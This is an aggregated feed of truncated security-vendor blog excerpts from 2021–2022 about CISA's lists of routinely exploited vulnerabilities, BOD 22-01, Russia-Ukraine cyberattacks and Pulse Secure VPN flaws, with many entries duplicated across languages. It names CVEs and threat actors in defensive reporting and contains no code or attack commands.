- Getting Started
The U.S. Cybersecurity & Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report’s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment.
The Cybersecurity & Infrastructure Security Agency (CISA) releases detailed alerts of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical i
Sentinelone
Enterprise Security Essentials | Top 15 Most Routinely Exploited Vulnerabilities 2022
blogs_sentinelone·2022-04-28·CVSS 9.8
[CRITICAL] Enterprise Security Essentials | Top 15 Most Routinely Exploited Vulnerabilities 2022
From remote code execution and privilege escalation to security bypasses and path traversal, software vulnerabilities are a threat actor’s stock-in-trade for initial access and compromise. In the past 12 months, we’ve seen a number of new flaws, including Log4Shell, ProxyShell, and ProxyLogon, being exploited in attacks against enterprises. These and other known bugs, some revealed as far back as 2017, continue to be routinely abused in environments where organizations have failed to properly inventory and patch. As CISA released its latest update on the most commonly exploited vulnerabilities, we take a look at each of the top 15 most routinely exploited bugs being used against businesses today.
## 1. Log4Shell (CVE-2021-44228)
Occupying top spot is the notorious flaw in the Apache Java
Sentinelone
Enterprise Security Essentials | Top 15 Most Routinely Exploited Vulnerabilities 2022
blogs_sentinelone·2022-04-28·CVSS 9.8
[CRITICAL] Enterprise Security Essentials | Top 15 Most Routinely Exploited Vulnerabilities 2022
From remote code execution and privilege escalation to security bypasses and path traversal, software vulnerabilities are a threat actor’s stock-in-trade for initial access and compromise. In the past 12 months, we’ve seen a number of new flaws, including Log4Shell, ProxyShell, and ProxyLogon, being exploited in attacks against enterprises. These and other known bugs, some revealed as far back as 2017, continue to be routinely abused in environments where organizations have failed to properly inventory and patch. As CISA released its latest update on the most commonly exploited vulnerabilities, we take a look at each of the top 15 most routinely exploited bugs being used against businesses today .
## 1. Log4Shell (CVE-2021-44228)
Occupying top spot is the notorious flaw in the Apache Jav
Qualys
Russia-Ukraine Crisis: How to Strengthen Your Security Posture to Protect against Cyber Attack, based on CISA Guidelines
blogs_qualys·2022-02-26
Russia-Ukraine Crisis: How to Strengthen Your Security Posture to Protect against Cyber Attack, based on CISA Guidelines
## Table of Contents
Protecting Customer Data on Qualys Cloud Platform
Urgent: Assess and Heighten Your Security Posture
Step 1: Monitor Your Shodan/Internet Exposed Assets
Step 2: Detect, Prioritize and Remediate CISAs Catalog ofKnown Exploited Vulnerabilities
Step 3: Protect Your Cloud Services and Office 365
Step 4: Continuously Detect any Potential Threats and Attacks
Take Action to Learn More about How to Strengthen Your Defenses
CISA has created Shields Up as a response to the Russian invasion of Ukraine. Qualys is responding with additional security, monitoring and governance measures. This blog details how and what our enterprise customers can do to immediately strengthen their security posture and meet CISA’s recommendations.
With the invasion of Ukraine by Russia, the U.
Tenable
Government Advisories Warn of APT Activity Resulting from Russian Invasion of Ukraine
blogs_tenable·2022-02-24
Government Advisories Warn of APT Activity Resulting from Russian Invasion of Ukraine
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys·2022-02-23
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Unit42
Russia-Ukraine Cyberattacks (Updated): How to Protect Against Related Cyberthreats Including DDoS, HermeticWiper, Gamaredon, Website Defacement, Phishing and Scams
blogs_unit42·2022-02-22
Russia-Ukraine Cyberattacks (Updated): How to Protect Against Related Cyberthreats Including DDoS, HermeticWiper, Gamaredon, Website Defacement, Phishing and Scams
Threat Research Center
Threat Research
Malware
## Russia-Ukraine Cyberattacks (Updated): How to Protect Against Related Cyberthreats Including DDoS, HermeticWiper, Gamaredon, Website Defacement, Phishing and Scams
Unit 42
Published: February 22, 2022
Malware
Threat Research
DDoS
Defacement
Gamaredon
HermeticWiper
Nation-state
Russia
Trident Ursa
Ukraine
WhisperGate
## Executive Summary
Over the past several weeks, Russia-Ukraine cyber activity has escalated substantially. Beginning on Feb. 15, a series of distributed denial of service (DDoS) attacks commenced. These attacks have continued over the past week, impacting both the Ukrainian government and banking institutions. On Feb. 23, a new variant of wiper malware named HermeticWiper was discovered in Ukraine. Shortl
Unit42
Russia-Ukraine Cyberattacks (Updated): How to Protect Against Related Cyberthreats Including DDoS, HermeticWiper, Gamaredon, Website Defacement, Phishing and Scams
blogs_unit42·2022-02-22
Russia-Ukraine Cyberattacks (Updated): How to Protect Against Related Cyberthreats Including DDoS, HermeticWiper, Gamaredon, Website Defacement, Phishing and Scams
## Executive Summary
Over the past several weeks, Russia-Ukraine cyber activity has escalated substantially. Beginning on Feb. 15, a series of distributed denial of service (DDoS) attacks commenced. These attacks have continued over the past week, impacting both the Ukrainian government and banking institutions. On Feb. 23, a new variant of wiper malware named HermeticWiper was discovered in Ukraine. Shortly after, a new round of website defacement attacks were also observed impacting Ukrainian government organizations.
Consistent with our previous reporting on the topic, several western governments have issued recommendations for their populations to prepare for cyberattacks that could disrupt, disable or destroy critical infrastructure. We have already observed an increase in Russian c
Qualys
Qualys Response to CISA Alert: Binding Operational Directive 22-01
blogs_qualys·2021-11-09
Qualys Response to CISA Alert: Binding Operational Directive 22-01
## Table of Contents
Overview
Directive Scope
CISA Catalog of Known Exploited Vulnerabilities
Detect CISAs Vulnerabilities Using Qualys VMDR
Remediation
Federal Enterprises and Agencies Can Act Now
Summary
Getting Started
Start your VMDR 30-day, no-cost trial today
## Overview
On November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directive 22-01 , “Reducing the Significant Risk of Known Exploited Vulnerabilities.” This directive recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate
Qualys
Qualys Response to CISA Alert: Binding Operational Directive 22-01 | Qualys
blogs_qualys·2021-11-09
Qualys Response to CISA Alert: Binding Operational Directive 22-01 | Qualys
#### Table of Contents
- Overview
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISAs Vulnerabilities Using Qualys VMDR
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
Start your VMDR 30-day, no-cost trial today
## Overview
On November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directive 22-01, “Reducing the Significant Risk of Known Exploited Vulnerabilities.” This directive recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to
Tenable
CISA’s Binding Operational Directive on Managing Unacceptable Risk Vulnerabilities in Federal Enterprises Is Key to Stopping Federal Cyberattacks
blogs_tenable·2021-11-03
CISA’s Binding Operational Directive on Managing Unacceptable Risk Vulnerabilities in Federal Enterprises Is Key to Stopping Federal Cyberattacks
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Trendmicro
CISA Reports Top Vulnerabilities From Remote Work
blogs_trendmicro·2021-09-21·CVSS 9.1
[CRITICAL] CISA Reports Top Vulnerabilities From Remote Work
Exploits & Vulnerabilities
## CISA Reports Top Vulnerabilities From Remote Work
Trend Micro’s Next-Generation IPS protects organizations from threats as attackers now target remote work-related vulnerabilities.
By: Jon Clay Sep 21, 2021 Read time: ( words)
Save to Folio
As COVID-19 moves people to the cloud, cyber actors now aim at shooting the sky.
On July 28, 2021, the US Cybersecurity and Infrastructure Security Agency (CISA) released a report detailing the top exploited vulnerabilities in 2020 and 2021. The report shows that the attackers’ favorite new targets are vulnerabilities published after 2019 and relevant to remote work, VPN (Virtual Private Network), and cloud-based technologies.
As remote work became widespread, cyber actors have been taking advantage of the young, unp
Trendmicro
CISA Reports Top Vulnerabilities From Remote Work
blogs_trendmicro·2021-09-21·CVSS 9.1
[CRITICAL] CISA Reports Top Vulnerabilities From Remote Work
Exploits & Vulnerabilities
# CISA Reports Top Vulnerabilities From Remote Work
Trend Micro’s Next-Generation IPS protects organizations from threats as attackers now target remote work-related vulnerabilities.
By: Jon Clay
2021/09/21
Read time: ( words)
Save to Folio
As COVID-19 moves people to the cloud, cyber actors now aim at shooting the sky.
On July 28, 2021, the US Cybersecurity and Infrastructure Security Agency (CISA) released a report detailing the top exploited vulnerabilities in 2020 and 2021. The report shows that the attackers’ favorite new targets are vulnerabilities published after 2019 and relevant to remote work, VPN (Virtual Private Network), and cloud-based technologies.
As remote work became widespread, cyber actors have been taking advantage of the young, unpat
Trendmicro
CISA Reports Top Vulnerabilities From Remote Work
blogs_trendmicro·2021-09-21·CVSS 9.1
[CRITICAL] CISA Reports Top Vulnerabilities From Remote Work
Exploits y vulnerabilidades
## CISA Reports Top Vulnerabilities From Remote Work
Trend Micro’s Next-Generation IPS protects organizations from threats as attackers now target remote work-related vulnerabilities.
By: Jon Clay Sep 21, 2021 Read time: ( words)
Save to Folio
As COVID-19 moves people to the cloud, cyber actors now aim at shooting the sky.
On July 28, 2021, the US Cybersecurity and Infrastructure Security Agency (CISA) released a report detailing the top exploited vulnerabilities in 2020 and 2021. The report shows that the attackers’ favorite new targets are vulnerabilities published after 2019 and relevant to remote work, VPN (Virtual Private Network), and cloud-based technologies.
As remote work became widespread, cyber actors have been taking advantage of the young, un
Huntress
The Top Four CVEs Attackers Exploit | Huntress
blogs_huntress·2021-09-21·CVSS 9.8
[CRITICAL] The Top Four CVEs Attackers Exploit | Huntress
While the move to remote work last year gave many of us comforts such as working in our pajamas and being 10 steps away from the fridge, it’s been a bit of a nightmare for those who work in cybersecurity.
The Institute for Security and Technology reports that in 2020, the victims of ransomware attacks paid $350M in ransom —a more than 300% increase over the previous year. By this year’s end, it’s predicted that cybercrime will cost the world $6 trillion . While cybercrime is a lucrative gig for hackers, it's expensive for the rest of us—and unfortunately, it's only getting worse with remote work.
In many ways, remote work has removed many of the security measures that organizations typically put in place to keep their data and networks secure. For example, corporate networks usually only
Trendmicro
CISA Reports Top Vulnerabilities From Remote Work
blogs_trendmicro·2021-09-21·CVSS 9.1
[CRITICAL] CISA Reports Top Vulnerabilities From Remote Work
Exploits & Vulnerabilities
## CISA Reports Top Vulnerabilities From Remote Work
Trend Micro’s Next-Generation IPS protects organizations from threats as attackers now target remote work-related vulnerabilities.
By: Jon Clay 2021/09/21 Read time: ( words)
Save to Folio
As COVID-19 moves people to the cloud, cyber actors now aim at shooting the sky.
On July 28, 2021, the US Cybersecurity and Infrastructure Security Agency (CISA) released a report detailing the top exploited vulnerabilities in 2020 and 2021. The report shows that the attackers’ favorite new targets are vulnerabilities published after 2019 and relevant to remote work, VPN (Virtual Private Network), and cloud-based technologies.
As remote work became widespread, cyber actors have been taking advantage of the young, unpat
Trendmicro
CISA Reports Top Vulnerabilities From Remote Work
blogs_trendmicro·2021-09-21·CVSS 9.1
[CRITICAL] CISA Reports Top Vulnerabilities From Remote Work
Sfruttamento vulnerabilità
## CISA Reports Top Vulnerabilities From Remote Work
Trend Micro’s Next-Generation IPS protects organizations from threats as attackers now target remote work-related vulnerabilities.
By: Jon Clay Sep 21, 2021 Read time: ( words)
Save to Folio
As COVID-19 moves people to the cloud, cyber actors now aim at shooting the sky.
On July 28, 2021, the US Cybersecurity and Infrastructure Security Agency (CISA) released a report detailing the top exploited vulnerabilities in 2020 and 2021. The report shows that the attackers’ favorite new targets are vulnerabilities published after 2019 and relevant to remote work, VPN (Virtual Private Network), and cloud-based technologies.
As remote work became widespread, cyber actors have been taking advantage of the young, unp
Trendmicro
CISA Reports Top Vulnerabilities From Remote Work
blogs_trendmicro·2021-09-21·CVSS 9.1
[CRITICAL] CISA Reports Top Vulnerabilities From Remote Work
Ausnutzung von Schwachstellen
## CISA Reports Top Vulnerabilities From Remote Work
Trend Micro’s Next-Generation IPS protects organizations from threats as attackers now target remote work-related vulnerabilities.
By: Jon Clay Sep 21, 2021 Read time: ( words)
Save to Folio
As COVID-19 moves people to the cloud, cyber actors now aim at shooting the sky.
On July 28, 2021, the US Cybersecurity and Infrastructure Security Agency (CISA) released a report detailing the top exploited vulnerabilities in 2020 and 2021. The report shows that the attackers’ favorite new targets are vulnerabilities published after 2019 and relevant to remote work, VPN (Virtual Private Network), and cloud-based technologies.
As remote work became widespread, cyber actors have been taking advantage of the young,
Tenable
Hold the Door: Why Organizations Need to Prioritize Patching SSL VPNs
blogs_tenable·2021-08-25
Hold the Door: Why Organizations Need to Prioritize Patching SSL VPNs
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Securelist
IT threat evolution Q2 2021
blogs_securelist·2021-08-12·CVSS 7.8
[HIGH] IT threat evolution Q2 2021
Table of Contents
- Targeted attacks
- Other malware
Authors
- David Emm
## Targeted attacks
### The leap of a Cycldek-related threat actor
It is quite common for Chinese-speaking threat actors to share tools and methodologies: one such example is the infamous “DLL side-loading triad”: a legitimate executable, a malicious DLL to be side-loaded by it and an encoded payload, generally dropped from a self-extracting archive. This was first thought to be a signature of LuckyMouse, but we have observed other groups using similar “triads”, including HoneyMyte. While it is not possible to attribute attacks based on this technique alone, efficient detection of such triads reveals more and more malicious activity.
We recently described one such file, called “FoundCore”, which caught our atte
Qualys
CISA Alert: Top Routinely Exploited Vulnerabilities | Qualys
blogs_qualys·2021-07-29·CVSS 10.0
[CRITICAL] CISA Alert: Top Routinely Exploited Vulnerabilities | Qualys
#### Table of Contents
- Top Routinely Exploited Vulnerabilities
- Detect CISAs Top Routinely Exploited Vulnerabilities using Qualys VMDR
- Recommendations
- Remediation and Mitigation
- Get Started Now
On July 28, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a cybersecurity advisory detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.
The advisory states, “If an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the large
Qualys
CISA Alert: Top Routinely Exploited Vulnerabilities
blogs_qualys·2021-07-29·CVSS 9.1
[CRITICAL] CISA Alert: Top Routinely Exploited Vulnerabilities
## Table of Contents
Top Routinely Exploited Vulnerabilities
Detect CISAs Top Routinely Exploited Vulnerabilities using Qualys VMDR
Recommendations
Remediation and Mitigation
Get Started Now
On July 28, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a cybersecurity advisory detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.
The advisory states, “If an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest numbe
Checkpoint
26th July – Threat Intelligence Report
blogs_checkpoint·2021-07-26·CVSS 10.0
CVE-2019-11510 [CRITICAL] 26th July – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 26th July – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 26th July, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
US officials have reported that Chinese state-sponsored threat actors successfully breached 13 US oil and natural gas pipeline companies between 2011 and 2013. The hackers gained initial access using a spear-phishing campaign, and their main goal was to gain strategic access and disrupt US pipeline operations.
The French Natio
Tenable
Focus on the Fundamentals: 6 Steps to Defend Against Ransomware
blogs_tenable·2021-07-21
Focus on the Fundamentals: 6 Steps to Defend Against Ransomware
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Management (CSPM)
Compliance
Cyber insurance
Data Security Posture Management (DSPM)
Google Cloud security
Infrastructure as Code (IaC) security
Kubernetes Security Pos
Securelist
Black Kingdom ransomware
blogs_securelist·2021-06-17·CVSS 10.0
CVE-2021-27065 [CRITICAL] Black Kingdom ransomware
Table of Contents
- Background
- Technical analysis
- Victims
- Attribution
- Appendix I – Indicators of Compromise
- Appendix II – MITRE ATT&CK Mapping
Authors
- Marc Rivero
## Python-coded malware used in Microsoft Exchange Server exploitation
Black Kingdom ransomware appeared on the scene back in 2019, but we observed some activity again in 2021. The ransomware was used by an unknown adversary for exploiting a Microsoft Exchange vulnerability (CVE-2021-27065).
The complexity and sophistication of the Black Kingdom family cannot bear a comparison with other Ransomware-as-a-Service (RaaS) or Big Game Hunting (BGH) families. The ransomware is coded in Python and compiled to an executable using PyInstaller; it supports two encryption modes: one generated dynamically and one using a h
Securelist
Black Kingdom ransomware
blogs_securelist·2021-06-17·CVSS 7.8
[HIGH] Black Kingdom ransomware
Table of Contents
Background
Technical analysis
Delivery methods
Sleep parameters
Ransomware is written in Python
Excluded directories
PowerShell command for process termination and history deletion
Encryption process
Encryption mistakes
System log cleanup
Ransomware note
Code analysis
Victims
Attribution
Appendix I – Indicators of Compromise
Appendix II – MITRE ATT&CK Mapping
Authors
Marc Rivero
## Python-coded malware used in Microsoft Exchange Server exploitation
Black Kingdom ransomware appeared on the scene back in 2019, but we observed some activity again in 2021. The ransomware was used by an unknown adversary for exploiting a Microsoft Exchange vulnerability (CVE-2021-27065).
The complexity and sophistication of the Black Kingdom family cannot bear a comparison
Zscaler
Reduce Business Risk by Eliminating the VPN Attack Surface
blogs_zscaler·2021-05-27
Reduce Business Risk by Eliminating the VPN Attack Surface
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Trendmicro
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
blogs_trendmicro·2021-04-28
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
Cyberbedrohungen
## How Trend Micro Helps Manage Exploited Vulnerabilities
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Read how Trend Micro protects customers from vulnerability exploits by blocking them as early as possible.
By: Jon Clay Apr 28, 2021 Read time: ( words)
Save to Folio
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Exploiting known vulnerabilities to successfully compromise an organization has long been a common tactic used by malicious actors. Whether Heartbleed, EternalBlue, or most recently Zerologon, threat actors take advantage of newly disclosed vulnerabilities in their attacks. But even with thousands of new vulnerabili
Trendmicro
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
blogs_trendmicro·2021-04-28
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
Cyber Threats
## How Trend Micro Helps Manage Exploited Vulnerabilities
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Read how Trend Micro protects customers from vulnerability exploits by blocking them as early as possible.
By: Jon Clay 2021/04/28 Read time: ( words)
Save to Folio
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Exploiting known vulnerabilities to successfully compromise an organization has long been a common tactic used by malicious actors. Whether Heartbleed, EternalBlue, or most recently Zerologon, threat actors take advantage of newly disclosed vulnerabilities in their attacks. But even with thousands of new vulnerabilities
Trendmicro
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
blogs_trendmicro·2021-04-28
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
Minacce cyber
## How Trend Micro Helps Manage Exploited Vulnerabilities
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Read how Trend Micro protects customers from vulnerability exploits by blocking them as early as possible.
By: Jon Clay Apr 28, 2021 Read time: ( words)
Save to Folio
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Exploiting known vulnerabilities to successfully compromise an organization has long been a common tactic used by malicious actors. Whether Heartbleed, EternalBlue, or most recently Zerologon, threat actors take advantage of newly disclosed vulnerabilities in their attacks. But even with thousands of new vulnerabilitie
Trendmicro
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
blogs_trendmicro·2021-04-28
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
Ciberamenazas
## How Trend Micro Helps Manage Exploited Vulnerabilities
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Read how Trend Micro protects customers from vulnerability exploits by blocking them as early as possible.
By: Jon Clay Apr 28, 2021 Read time: ( words)
Save to Folio
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Exploiting known vulnerabilities to successfully compromise an organization has long been a common tactic used by malicious actors. Whether Heartbleed, EternalBlue, or most recently Zerologon, threat actors take advantage of newly disclosed vulnerabilities in their attacks. But even with thousands of new vulnerabilitie
Trendmicro
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
blogs_trendmicro·2021-04-28
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
Cyber Threats
## How Trend Micro Helps Manage Exploited Vulnerabilities
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Read how Trend Micro protects customers from vulnerability exploits by blocking them as early as possible.
By: Jon Clay Apr 28, 2021 Read time: ( words)
Save to Folio
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Exploiting known vulnerabilities to successfully compromise an organization has long been a common tactic used by malicious actors. Whether Heartbleed, EternalBlue, or most recently Zerologon, threat actors take advantage of newly disclosed vulnerabilities in their attacks. But even with thousands of new vulnerabilitie
Trendmicro
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
blogs_trendmicro·2021-04-28
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
Cyber Threats
# How Trend Micro Helps Manage Exploited Vulnerabilities
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Read how Trend Micro protects customers from vulnerability exploits by blocking them as early as possible.
By: Jon Clay
2021/04/28
Read time: ( words)
Save to Folio
Photo credit: pxhere
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Exploiting known vulnerabilities to successfully compromise an organization has long been a common tactic used by malicious actors. Whether Heartbleed, EternalBlue, or most recently Zerologon, threat actors take advantage of newly disclosed vulnerabilities in their attacks. But even with thousands o
Talos
Threat Advisory: Pulse Secure Connect Coverage
blogs_talos·2021-04-22·CVSS 10.0
CVE-2021-22893 [CRITICAL] Threat Advisory: Pulse Secure Connect Coverage
## Threat Advisory: Pulse Secure Connect Coverage
Pulse Secure announced that a critical vulnerability (CVE-2021-22893) was discovered in their VPN service "Pulse Secure Connect" in a recent security advisory .
The advisory states that, "a vulnerability was discovered under Pulse Connect Secure (PCS). This includes an authentication by-pass vulnerability that can allow an unauthenticated user to perform remote arbitrary file execution on the Pulse Connect Secure gateway. This vulnerability has a critical CVSS score and poses a significant risk to your deployment."
The company released a blog post alongside this advisory disclosing that the vulnerability has been exploited in the wild. According to the blog post, several other previously known vulnerabilities were exploited during these
Talos
Threat Advisory: Pulse Secure Connect Coverage
blogs_talos·2021-04-22·CVSS 10.0
CVE-2021-22893 [CRITICAL] Threat Advisory: Pulse Secure Connect Coverage
Pulse Secure announced that a critical vulnerability (CVE-2021-22893) was discovered in their VPN service "Pulse Secure Connect" in a recent security advisory.
The advisory states that, "a vulnerability was discovered under Pulse Connect Secure (PCS). This includes an authentication by-pass vulnerability that can allow an unauthenticated user to perform remote arbitrary file execution on the Pulse Connect Secure gateway. This vulnerability has a critical CVSS score and poses a significant risk to your deployment."
The company released a blog post alongside this advisory disclosing that the vulnerability has been exploited in the wild. According to the blog post, several other previously known vulnerabilities were exploited during these incidents:
- CVE-2019-11510
- CVE-2020-8243
- CVE-2
Tenable
CVE-2021-22893: Zero-Day Vulnerability in Pulse Connect Secure Exploited in the Wild
blogs_tenable·2021-04-20·CVSS 10.0
[CRITICAL] CVE-2021-22893: Zero-Day Vulnerability in Pulse Connect Secure Exploited in the Wild
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Checkpoint
19th April – Threat Intelligence Report
blogs_checkpoint·2021-04-19·CVSS 9.8
CVE-2018-13379 [CRITICAL] 19th April – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 19th April – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 19th April, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
The U.S National Security Agency (NSA), the Cybersecurity and infrastructure security agency (CISA), and the Federal Bureau of Investigation (FBI) have published a joint advisory warning that a Russia-linked APT group, APT25, is exploiting five vulnerabilities in an ongoing attack against U.S targets.
Check Point IPS provide
Talos
Threat Advisory: NSA SVR Advisory Coverage
blogs_talos·2021-04-15·CVSS 9.1
[CRITICAL] Threat Advisory: NSA SVR Advisory Coverage
## Threat Advisory: NSA SVR Advisory Coverage
The U.S. National Security Agency released an advisory outlining several vulnerabilities that the Russian Foreign Intelligence Services (SVR) is exploiting in the wild. The U.S. formally attributed the recent SolarWinds supply chain attack to the SVR group in this advisory and detailed more of the group's tactics, techniques and procedures.
The exploits included a series of five CVEs that affect VPN solutions, collaboration suite software and virtualization technologies. All five of the CVEs have been patched — Cisco Talos encourages everyone with the affected software update immediately. Some of these vulnerabilities also have working metasploit modules and are currently being widely exploited. Please note that some of these vulnerabilities
Talos
Threat Advisory: NSA SVR Advisory Coverage
blogs_talos·2021-04-15·CVSS 9.1
[CRITICAL] Threat Advisory: NSA SVR Advisory Coverage
The U.S. National Security Agency released an advisory outlining several vulnerabilities that the Russian Foreign Intelligence Services (SVR) is exploiting in the wild. The U.S. formally attributed the recent SolarWinds supply chain attack to the SVR group in this advisory and detailed more of the group's tactics, techniques and procedures.
The exploits included a series of five CVEs that affect VPN solutions, collaboration suite software and virtualization technologies. All five of the CVEs have been patched — Cisco Talos encourages everyone with the affected software update immediately. Some of these vulnerabilities also have working metasploit modules and are currently being widely exploited. Please note that some of these vulnerabilities exploit applications leveraging SSL. This means
Checkpoint
5th April – Threat Intelligence Report
blogs_checkpoint·2021-04-05
CVE-2021-21975 5th April – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
